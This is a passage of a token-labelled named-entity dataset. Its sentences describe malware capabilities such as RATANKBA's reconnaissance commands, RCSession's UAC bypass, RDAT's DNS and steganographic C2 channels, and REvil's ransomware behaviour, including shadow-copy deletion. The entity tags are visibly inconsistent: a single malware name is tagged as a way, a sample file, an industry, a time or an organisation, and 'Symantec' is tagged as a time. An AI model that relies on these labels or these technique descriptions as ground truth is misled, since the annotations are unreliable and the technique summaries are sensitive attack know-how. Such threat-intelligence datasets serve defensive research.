- "B-Way", - "I-Features", - "I-Features", - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RARSTONE", - "uses", - "SSL", - "to", - "encrypt", - "its", - "communication", - "with", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "performs", - "a", - "reflective", - "DLL", - "injection", - "using", - "a", - "given", - "pid." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "uploads", - "and", - "downloads", - "information." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "uses", - "the", - "<code>net", - "user</code>", - "command." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "There", - "is", - "a", - "variant", - "of", - "RATANKBA", - "that", - "uses", - "a", - "PowerShell", - "script", - "instead", - "of", - "the", - "traditional", - "PE", - "form." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "lists", - "the", - "system’s", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "uses", - "the", - "command", - "<code>reg", - "query", - "“HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\InternetSettings”</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "runs", - "the", - "<code>net", - "view", - "/domain</code>", - "and", - "<code>net", - "view</code>", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "gathers", - "information", - "about", - "the", - "OS", - "architecture,", - "OS", - "name,", - "and", - "OS", - "version/Service", - "pack." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "gathers", - "the", - "victim’s", - "IP", - "address", - "via", - "the", - "<code>ipconfig", - "-all</code>", - "command." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "uses", - "<code>netstat", - "-ano</code>", - "to", - "search", - "for", - "specific", - "IP", - "address", - "ranges." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "runs", - "the", - "<code>whoami</code>", - "and", - "<code>query", - "user</code>", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "uses", - "<code>tasklist", - "/svc</code>", - "to", - "display", - "running", - "tasks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "uses", - "HTTP/HTTPS", - "for", - "command", - "and", - "control", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "uses", - "cmd.exe", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RATANKBA", - "uses", - "WMI", - "to", - "perform", - "process", - "monitoring." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "bypass", - "UAC", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "be", - "installed", - "via", - "DLL", - "side-loading." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "collect", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "use", - "an", - "encrypted", - "beacon", - "to", - "check", - "in", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "compress", - "and", - "obfuscate", - "its", - "strings", - "to", - "evade", - "detection", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "remove", - "files", - "from", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "store", - "its", - "obfuscated", - "configuration", - "file", - "in", - "the", - "Registry", - "under", - "`HKLM\\SOFTWARE\\Plus`", - "or", - "`HKCU\\SOFTWARE\\Plus`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "RCSession", - "has", - "the", - "ability", - "to", - "drop", - "additional", - "files", - "to", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "has", - "the", - "ability", - "to", - "capture", - "keystrokes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "has", - "used", - "a", - "file", - "named", - "English.rtf", - "to", - "appear", - "benign", - "on", - "victim", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "write", - "its", - "configuration", - "file", - "to", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "has", - "the", - "ability", - "to", - "execute", - "inside", - "the", - "msiexec.exe", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "use", - "WinSock", - "API", - "for", - "communication", - "including", - "<code>WSASend</code>", - "and", - "<code>WSARecv</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "RCSession", - "has", - "the", - "ability", - "to", - "use", - "TCP", - "and", - "UDP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "identify", - "processes", - "based", - "on", - "PID." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "launch", - "itself", - "from", - "a", - "hollowed", - "svchost.exe", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "has", - "the", - "ability", - "to", - "modify", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "capture", - "screenshots", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "gather", - "system", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "gather", - "system", - "owner", - "information,", - "including", - "user", - "and", - "administrator", - "privileges." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "use", - "HTTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RCSession", - "can", - "use", - "`cmd.exe`", - "for", - "execution", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "has", - "used", - "DNS", - "to", - "communicate", - "with", - "the", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "RDAT", - "has", - "used", - "encoded", - "data", - "within", - "subdomains", - "as", - "AES", - "ciphertext", - "to", - "communicate", - "from", - "the", - "host", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "upload", - "a", - "file", - "via", - "HTTP", - "POST", - "response", - "to", - "the", - "C2", - "split", - "into", - "102,400-byte", - "portions.", - "RDAT", - "can", - "also", - "download", - "data", - "from", - "the", - "C2", - "which", - "is", - "split", - "into", - "81,920-byte", - "portions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "deobfuscate", - "the", - "base64-encoded", - "and", - "AES-encrypted", - "files", - "downloaded", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "exfiltrate", - "data", - "gathered", - "from", - "the", - "infected", - "system", - "via", - "the", - "established", - "Exchange", - "Web", - "Services", - "API", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "has", - "used", - "HTTP", - "if", - "DNS", - "C2", - "communications", - "were", - "not", - "functioning." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "issue", - "SOAP", - "requests", - "to", - "delete", - "already", - "processed", - "C2", - "emails.", - "RDAT", - "can", - "also", - "delete", - "itself", - "from", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "download", - "files", - "via", - "DNS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "use", - "email", - "attachments", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "has", - "used", - "Windows", - "Video", - "Service", - "as", - "a", - "name", - "for", - "malicious", - "services." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "has", - "masqueraded", - "as", - "VMware.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "communicate", - "with", - "the", - "C2", - "via", - "subdomains", - "that", - "utilize", - "base64", - "with", - "character", - "substitutions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "take", - "a", - "screenshot", - "on", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "communicate", - "with", - "the", - "C2", - "via", - "base32-encoded", - "subdomains." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "also", - "embed", - "data", - "within", - "a", - "BMP", - "image", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "process", - "steganographic", - "images", - "attached", - "to", - "email", - "messages", - "to", - "send", - "and", - "receive", - "C2", - "commands.", - "RDAT", - "can", - "also", - "embed", - "additional", - "messages", - "within", - "BMP", - "images", - "to", - "communicate", - "with", - "the", - "RDAT", - "operator." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "has", - "used", - "AES", - "ciphertext", - "to", - "encode", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "can", - "use", - "HTTP", - "communications", - "for", - "C2,", - "as", - "well", - "as", - "using", - "the", - "WinHTTP", - "library", - "to", - "make", - "requests", - "to", - "the", - "Exchange", - "Web", - "Services", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDAT", - "has", - "executed", - "commands", - "using", - "<code>cmd.exe", - "/c</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "RDAT", - "has", - "created", - "a", - "service", - "when", - "it", - "is", - "installed", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDFSNIFFER", - "hooks", - "several", - "Win32", - "API", - "functions", - "to", - "hijack", - "elements", - "of", - "the", - "remote", - "system", - "management", - "user-interface." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDFSNIFFER", - "has", - "the", - "capability", - "of", - "deleting", - "local", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "RDFSNIFFER", - "has", - "used", - "several", - "Win32", - "API", - "functions", - "to", - "interact", - "with", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "has", - "encrypted", - "C2", - "communications", - "with", - "the", - "ECIES", - "algorithm." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "launch", - "an", - "instance", - "of", - "itself", - "with", - "administrative", - "rights", - "using", - "runas." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "REvil", - "has", - "the", - "capability", - "to", - "destroy", - "files", - "and", - "folders." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "REvil", - "can", - "encrypt", - "files", - "on", - "victim", - "systems", - "and", - "demands", - "a", - "ransom", - "to", - "decrypt", - "the", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "decode", - "encrypted", - "strings", - "to", - "enable", - "execution", - "of", - "commands", - "and", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "REvil", - "can", - "connect", - "to", - "and", - "disable", - "the", - "Symantec", - "server", - "on", - "the", - "victim's", - "network." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "identify", - "the", - "domain", - "membership", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "has", - "infected", - "victim", - "machines", - "through", - "compromised", - "websites", - "and", - "exploit", - "kits." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "REvil", - "has", - "used", - "encrypted", - "strings", - "and", - "configuration", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Tool", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "exfiltrate", - "host", - "and", - "malware", - "information", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "mark", - "its", - "binary", - "code", - "for", - "deletion", - "after", - "reboot." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "has", - "the", - "ability", - "to", - "identify", - "specific", - "files", - "and", - "directories", - "that", - "are", - "not", - "to", - "be", - "encrypted." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "save", - "encryption", - "parameters", - "and", - "system", - "information", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "download", - "a", - "copy", - "of", - "itself", - "from", - "an", - "attacker", - "controlled", - "IP", - "address", - "to", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "use", - "vssadmin", - "to", - "delete", - "volume", - "shadow", - "copies", - "and", - "bcdedit", - "to", - "disable", - "recovery", - "features." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "has", - "been", - "executed", - "via", - "malicious", - "MS", - "Word", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "REvil", - "can", - "mimic", - "the", - "names", - "of", - "known", - "executables." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "modify", - "the", - "Registry", - "to", - "save", - "encryption", - "parameters", - "and", - "system", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "use", - "Native", - "API", - "for", - "execution", - "and", - "to", - "retrieve", - "active", - "services." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "REvil", - "has", - "used", - "PowerShell", - "to", - "delete", - "volume", - "shadow", - "copies", - "and", - "download", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "inject", - "itself", - "into", - "running", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "query", - "the", - "Registry", - "to", - "get", - "random", - "file", - "extensions", - "to", - "append", - "to", - "encrypted", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "force", - "a", - "reboot", - "in", - "safe", - "mode", - "with", - "networking." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "has", - "the", - "capability", - "to", - "stop", - "services", - "and", - "kill", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "REvil", - "has", - "been", - "distributed", - "via", - "malicious", - "e-mail", - "attachments", - "including", - "MS", - "Word", - "Documents." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "REvil", - "can", - "identify", - "the", - "username,", - "machine", - "name,", - "system", - "language,", - "keyboard", - "layout,", - "OS", - "version,", - "and", - "system", - "drive", - "information", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "check", - "the", - "system", - "language", - "using", - "<code>GetUserDefaultUILanguage</code>", - "and", - "<code>GetSystemDefaultUILanguage</code>.", - "If", - "the", - "language", - "is", - "found", - "in", - "the", - "list,", - "the", - "process", - "terminates." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "enumerate", - "active", - "services." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Idus", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "obtain", - "the", - "token", - "from", - "the", - "user", - "that", - "launched", - "the", - "explorer.exe", - "process", - "to", - "avoid", - "affecting", - "the", - "desktop", - "of", - "the", - "SYSTEM", - "user." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Org" - ] - }, - { - "tokens": [ - "REvil", - "has", - "used", - "obfuscated", - "VBA", - "macros", - "for", - "execution." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "has", - "used", - "HTTP", - "and", - "HTTPS", - "in", - "communication", - "with", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "use", - "the", - "Windows", - "command", - "line", - "to", - "delete", - "volume", - "shadow", - "copies", - "and", - "disable", - "recovery." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "REvil", - "can", - "use", - "WMI", - "to", - "monitor", - "for", - "and", - "kill", - "specific", - "processes", - "listed", - "in", - "its", - "configuration", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RGDoor", - "encrypts", - "files", - "with", - "XOR", - "before", - "sending", - "them", - "back", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RGDoor", - "decodes", - "Base64", - "strings", - "and", - "decrypts", - "strings", - "using", - "a", - "custom", - "XOR", - "algorithm." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "RGDoor", - "establishes", - "persistence", - "on", - "webservers", - "as", - "an", - "IIS", - "module." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RGDoor", - "uploads", - "and", - "downloads", - "files", - "to", - "and", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RGDoor", - "executes", - "the", - "<code>whoami</code>", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RGDoor", - "uses", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RGDoor", - "uses", - "cmd.exe", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT12", - "has", - "used", - "the", - "RIPTIDE", - "RAT,", - "which", - "communicates", - "over", - "HTTP", - "with", - "a", - "payload", - "encrypted", - "with", - "RC4." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT12", - "has", - "used", - "RIPTIDE,", - "a", - "RAT", - "that", - "uses", - "HTTP", - "to", - "communicate." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "ROADTools", - "automatically", - "gathers", - "data", - "from", - 